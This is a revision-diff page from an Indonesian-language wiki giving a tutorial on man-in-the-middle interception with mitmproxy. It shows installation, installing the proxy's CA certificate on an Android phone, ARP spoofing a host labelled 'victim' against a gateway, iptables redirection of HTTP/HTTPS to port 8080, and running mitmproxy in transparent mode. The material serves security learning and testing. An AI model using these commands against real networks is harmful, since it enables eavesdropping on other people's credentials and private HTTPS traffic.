Difference between revisions of "MITM: mitmproxy"

From OnnoWiki
Jump to navigation Jump to search
Line 53: Line 53:
 
  iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
 
  iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
  
 
+
  arpspoof -i wlan0 -t 192.168.0.10 192.168.0.100
  arpspoof -i wlan0 192.168.0.10 192.168.0.100
+
  arpspoof -i wlan0 -t 192.168.0.100 192.168.0.10
  arpspoof -i wlan0 192.168.0.100 192.168.0.10
 
  
 
==Jalankan mitmproxy==
 
==Jalankan mitmproxy==

Revision as of 10:00, 2 October 2018

Sumber: https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/


Instalasi kalau dibutuhkan

Untuk non-Kali Linux perlu menginstalasi mitmproxy melalui perintah berikut.

Instalasi mitmproxy

apt-get install python-pyasn1 python-flask python-urwid python-dev libxml2-dev libxslt-dev libffi-dev
pip install mitmproxy

Ini tidak perlu dilakukan di Kali Linux, karena kali linux sudah siap dengan mitmproxy.

Install CA

Kalau mau benar2 menipu browser, kita perlu menginstalasi CA Certificate MITMproxy, dari

~/.mitmproxy/mitmproxy-ca-cert.cer

ke android,

/sdcard/Download/mitmproxy-ca-cert.cer

Masuk ke menu android

  • Settings > Security > “Install from device storage”
  • Masukan “mitmproxy-ca-cert” (tanpa suffix!) > click “OK”
  • Klik “Trusted credentials” > Pilih “User” tab.
  • Certificate harusnya akan muncul di list.

Redirect IP

ARPspoofing supaya gampang misalnya,

arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
192.168.0.106 = ip victim
192.168.0.100 = ip router / gateway / server yang akan di monitor


mitmproxy secara internal run pada port 8080. Secara external run pada port 80/HTTP dan 443/HTTPS. Lakukan,

sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080


Atau jika menggunakan Wifi / wlan0

sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.0.10 192.168.0.100
arpspoof -i wlan0 -t 192.168.0.100 192.168.0.10

Jalankan mitmproxy

Jalankan transparan proxy

mitmproxy --mode transparent


versi lama

mitmproxy -T --host

untuk memonitor pada port lain gunakan switch -p


Referensi